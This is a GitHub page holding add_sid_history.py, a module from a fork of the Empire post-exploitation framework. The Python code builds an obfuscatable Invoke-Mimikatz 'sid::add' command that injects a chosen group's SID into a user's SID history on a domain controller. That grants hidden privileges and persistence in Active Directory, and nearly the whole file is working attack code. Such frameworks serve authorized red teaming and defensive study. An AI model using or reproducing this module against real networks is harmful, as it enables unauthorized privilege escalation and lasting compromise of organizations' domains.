forked from EmpireProject/Empire
-
-
Notifications
You must be signed in to change notification settings - Fork 586
/
add_sid_history.py
39 lines (34 loc) · 1.31 KB
/
add_sid_history.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from empire.server.common.empire import MainMenu
from empire.server.core.module_models import EmpireModule
from empire.server.utils.module_util import handle_error_message
class Module:
@staticmethod
def generate(
main_menu: MainMenu,
module: EmpireModule,
params: dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modulesv2.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
# build the custom command with whatever options we want
command = f'"sid::add /sam:{params["User"]} /new:{params["Group"]}"'
command = f"-Command '{command}'"
if params.get("ComputerName"):
command = f'{command} -ComputerName "{params["ComputerName"]}"'
# base64 encode the command to pass to Invoke-Mimikatz
script_end = f"Invoke-Mimikatz {command};"
script = main_menu.modulesv2.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script